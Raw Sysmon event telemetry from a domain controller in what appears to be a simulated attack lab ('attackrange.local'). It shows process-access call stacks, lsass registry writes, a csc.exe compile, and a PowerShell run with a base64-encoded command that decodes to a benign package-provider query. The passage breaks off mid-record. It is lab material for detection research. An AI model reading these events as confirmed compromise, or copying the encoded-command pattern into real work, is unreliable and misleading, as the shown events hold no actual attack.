13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8582-5FCF-B300-000000009101}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8581-5FCF-B200-000000009101}31364732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8582-5FCF-B300-000000009101}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+18fb3b80(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\fec023c8de0ed58c816cd442e3b4ddfe\Microsoft.PowerShell.Commands.Utility.ni.dll+18fb3b80(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b37347(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64) 154100x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.889{10ACEC4A-8582-5FCF-B300-000000009101}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\hz4jjg4n\hz4jjg4n.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABHAGUAdAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByAA== 11241100x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\hz4jjg4n\hz4jjg4n.cmdline2020-12-08 13:54:10.878 11241100x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:10.878{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\hz4jjg4n\hz4jjg4n.dll2020-12-08 13:54:10.878 13241300x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:54:10.628{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:54:10.628{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00011ebe) 13241300x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:54:10.628{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6cd5f-0xceddb9ab) 13241300x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:54:10.628{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6cd68-0x30a221ab) 13241300x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:54:10.628{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6cd70-0x926689ab) 10341000x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.019{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.019{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8583-5FCF-BA00-000000009101}816C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-BA00-000000009101}816C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-8583-5FCF-B900-000000009101}49682228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8583-5FCF-BA00-000000009101}816C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253194(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271eca(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625552f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625552f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247345(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253878(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625346b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253194(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa